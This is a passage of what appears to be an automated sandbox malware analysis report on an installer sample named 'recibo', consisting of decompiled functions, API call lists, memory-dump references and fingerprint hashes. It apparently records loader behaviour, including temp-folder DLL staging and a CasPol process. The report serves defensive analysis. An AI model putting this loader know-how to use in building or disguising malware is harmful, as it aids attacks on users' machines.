					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}


























                                                                                  0x715410eb
                                                                                  0x71541100
                                                                                  0x71541109
                                                                                  0x7154110e
                                                                                  0x71541119
                                                                                  0x7154111c
                                                                                  0x71541125
                                                                                  0x71541129
                                                                                  0x7154112b
                                                                                  0x715412b0
                                                                                  0x715412ba
                                                                                  0x715412ba
                                                                                  0x71541132
                                                                                  0x71541132
                                                                                  0x71541137
                                                                                  0x71541138
                                                                                  0x7154113a
                                                                                  0x7154113d
                                                                                  0x71541256
                                                                                  0x71541259
                                                                                  0x71541271
                                                                                  0x71541271
                                                                                  0x71541278
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541285
                                                                                  0x7154128a
                                                                                  0x7154128f
                                                                                  0x71541294
                                                                                  0x7154129a
                                                                                  0x7154129b
                                                                                  0x00000000
                                                                                  0x7154129b
                                                                                  0x7154125b
                                                                                  0x7154125e
                                                                                  0x715411bc
                                                                                  0x715411bf
                                                                                  0x715411c2
                                                                                  0x715411cb
                                                                                  0x715411d0
                                                                                  0x00000000
                                                                                  0x715411d1
                                                                                  0x71541264
                                                                                  0x71541266
                                                                                  0x715411a2
                                                                                  0x715411a5
                                                                                  0x715411a8
                                                                                  0x715411b1
                                                                                  0x00000000
                                                                                  0x715411b1
                                                                                  0x71541164
                                                                                  0x71541165
                                                                                  0x71541177
                                                                                  0x71541180
                                                                                  0x71541184
                                                                                  0x7154118e
                                                                                  0x71541191
                                                                                  0x71541193
                                                                                  0x71541193
                                                                                  0x00000000
                                                                                  0x71541165
                                                                                  0x71541143
                                                                                  0x71541218
                                                                                  0x7154121d
                                                                                  0x71541221
                                                                                  0x71541223
                                                                                  0x7154122c
                                                                                  0x7154122f
                                                                                  0x71541238
                                                                                  0x7154123d
                                                                                  0x7154123d
                                                                                  0x71541247
                                                                                  0x7154124a
                                                                                  0x00000000
                                                                                  0x71541250
                                                                                  0x71541149
                                                                                  0x7154114c
                                                                                  0x715411e9
                                                                                  0x715411ed
                                                                                  0x715411f7
                                                                                  0x715411fb
                                                                                  0x71541205
                                                                                  0x7154120a
                                                                                  0x71541211
                                                                                  0x00000000
                                                                                  0x71541211
                                                                                  0x71541152
                                                                                  0x71541155
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154115b
                                                                                  0x7154115e
                                                                                  0x715411b8
                                                                                  0x00000000
                                                                                  0x715411b8
                                                                                  0x71541160
                                                                                  0x71541162
                                                                                  0x7154119e
                                                                                  0x00000000
                                                                                  0x7154119e
                                                                                  0x00000000
                                                                                  0x715412a1
                                                                                  0x715412a1
                                                                                  0x715412ab
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 71541171
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 715411E3
                                                                                  • GlobalFree.KERNEL32 ref: 7154124A
                                                                                  • GlobalFree.KERNEL32(?), ref: 7154129B
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 715412B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1780285237-0
                                                                                  • Opcode ID: 6076240114f08b7cd6b7b5571661c699460cd7abcd334bedd2f0696ce03abf8d
                                                                                  • Instruction ID: b4dcdfd5ad0d546127b6d3232fa3aee3dd48cdac401c3c5ccf543c05776262df
                                                                                  • Opcode Fuzzy Hash: 6076240114f08b7cd6b7b5571661c699460cd7abcd334bedd2f0696ce03abf8d
                                                                                  • Instruction Fuzzy Hash: A351A3BA518202DFE709CF7AD988A197BF8FB45315B215516FD5ADB210E730F900CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 92%
                                                                                  			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040649D(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                                                  0x0040263e
                                                                                  0x0040263e
                                                                                  0x0040263e
                                                                                  0x00402643
                                                                                  0x00402646
                                                                                  0x00402649
                                                                                  0x0040264e
                                                                                  0x00402650
                                                                                  0x00402670
                                                                                  0x004026aa
                                                                                  0x00402672
                                                                                  0x00402674
                                                                                  0x00402688
                                                                                  0x00402695
                                                                                  0x00402695
                                                                                  0x00402652
                                                                                  0x00402654
                                                                                  0x00402659
                                                                                  0x00402667
                                                                                  0x0040266a
                                                                                  0x004026af
                                                                                  0x004026b2
                                                                                  0x0040292e
                                                                                  0x0040292e
                                                                                  0x004026b8
                                                                                  0x004026c1
                                                                                  0x004026c3
                                                                                  0x004026e2
                                                                                  0x004015b4
                                                                                  0x004015b6
                                                                                  0x00000000
                                                                                  0x004015bc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004026c3
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll), ref: 00402695
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsf321E.tmp$C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll
                                                                                  • API String ID: 1659193697-3752121594
                                                                                  • Opcode ID: a2d9691ea381e88d042a05527e8249a96b52758ce21b98351f65b3f5d82e54dc
                                                                                  • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                  • Opcode Fuzzy Hash: a2d9691ea381e88d042a05527e8249a96b52758ce21b98351f65b3f5d82e54dc
                                                                                  • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x42aa20; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x434f0c;
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}






                                                                                  0x00403020
                                                                                  0x0040303a
                                                                                  0x00403040
                                                                                  0x0040304a
                                                                                  0x00403050
                                                                                  0x00403056
                                                                                  0x00403067
                                                                                  0x00403070
                                                                                  0x00000000
                                                                                  0x00403075
                                                                                  0x0040307c
                                                                                  0x00403042
                                                                                  0x00403049
                                                                                  0x00403049
                                                                                  0x00403022
                                                                                  0x00403022
                                                                                  0x00403029
                                                                                  0x0040302c
                                                                                  0x0040302c
                                                                                  0x00403032
                                                                                  0x00403039
                                                                                  0x00403039

                                                                                  APIs
                                                                                  • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                  • GetTickCount.KERNEL32 ref: 0040304A
                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                  • String ID:
                                                                                  • API String ID: 2102729457-0
                                                                                  • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                  • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                  • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                  • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 89%
                                                                                  			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}





                                                                                  0x00405517
                                                                                  0x00405521
                                                                                  0x0040553d
                                                                                  0x0040555f
                                                                                  0x00405562
                                                                                  0x00405568
                                                                                  0x00405572
                                                                                  0x00405573
                                                                                  0x00405575
                                                                                  0x0040557b
                                                                                  0x0040557b
                                                                                  0x00405585
                                                                                  0x00000000
                                                                                  0x00405593
                                                                                  0x0040554a
                                                                                  0x00405582
                                                                                  0x00405582
                                                                                  0x00000000
                                                                                  0x00405582
                                                                                  0x00405556
                                                                                  0x00405558
                                                                                  0x00000000
                                                                                  0x00405558
                                                                                  0x00405527
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040552e
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 00405542
                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                    • Part of subcall function 004044E5: SendMessageW.USER32(0001043C,00000000,00000000,00000000), ref: 004044F7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                  • String ID:
                                                                                  • API String ID: 3748168415-3916222277
                                                                                  • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                  • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                  • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                  • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 90%
                                                                                  			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                  0x00406419
                                                                                  0x0040641b
                                                                                  0x00406433
                                                                                  0x00406438
                                                                                  0x0040643d
                                                                                  0x0040647b
                                                                                  0x0040647b
                                                                                  0x0040643f
                                                                                  0x00406451
                                                                                  0x0040645c
                                                                                  0x00406462
                                                                                  0x0040646d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040646d
                                                                                  0x00406481

                                                                                  APIs
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                  • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll), ref: 0040645C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID: Call
                                                                                  • API String ID: 3356406503-1824292864
                                                                                  • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                  • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                  • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                  • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}







                                                                                  0x00403b58
                                                                                  0x00403b60
                                                                                  0x00403b67
                                                                                  0x00403b6a
                                                                                  0x00403b6a
                                                                                  0x00403b6c
                                                                                  0x00403b71
                                                                                  0x00403b78
                                                                                  0x00403b7e
                                                                                  0x00403b82
                                                                                  0x00403b83
                                                                                  0x00403b8b

                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?,77343420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                  • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$GlobalLibrary
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 1100898210-3355392842
                                                                                  • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                  • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                  • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                  • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                  0x00405fa2
                                                                                  0x00405fa4
                                                                                  0x00405fa7
                                                                                  0x00405fd3
                                                                                  0x00405fac
                                                                                  0x00405fb5
                                                                                  0x00405fba
                                                                                  0x00405fc5
                                                                                  0x00405fc8
                                                                                  0x00405fe4
                                                                                  0x00405fca
                                                                                  0x00405fd1
                                                                                  0x00000000
                                                                                  0x00405fd1
                                                                                  0x00405fdd
                                                                                  0x00405fe1
                                                                                  0x00405fe1
                                                                                  0x00405fdb
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                  • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 190613189-0
                                                                                  • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                  • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                  • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                  • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:24.9%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:4
                                                                                  Total number of Limit Nodes:1
                                                                                  execution_graph 16382 d14d4d 16383 d01657 16382->16383 16384 d14c01 TerminateThread 16383->16384 16385 d14da6 16383->16385 16384->16383

                                                                                  Executed Functions

                                                                                  Function 1D3DA160 Relevance: .3, Instructions: 266COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ae943f1b1d16332a0eff172fb25f52209ef88b0bad0d6816f1174daed237b23
                                                                                  • Instruction ID: df496105be97be67d29174863df86ab0e4081c0fc3c72d03624e5007316bebf0
                                                                                  • Opcode Fuzzy Hash: 0ae943f1b1d16332a0eff172fb25f52209ef88b0bad0d6816f1174daed237b23
                                                                                  • Instruction Fuzzy Hash: 78B18E71E047098FDB40CFA5CA857AEBBF2BF48354F548629D405A7354EB749846CF82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00D14C01 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
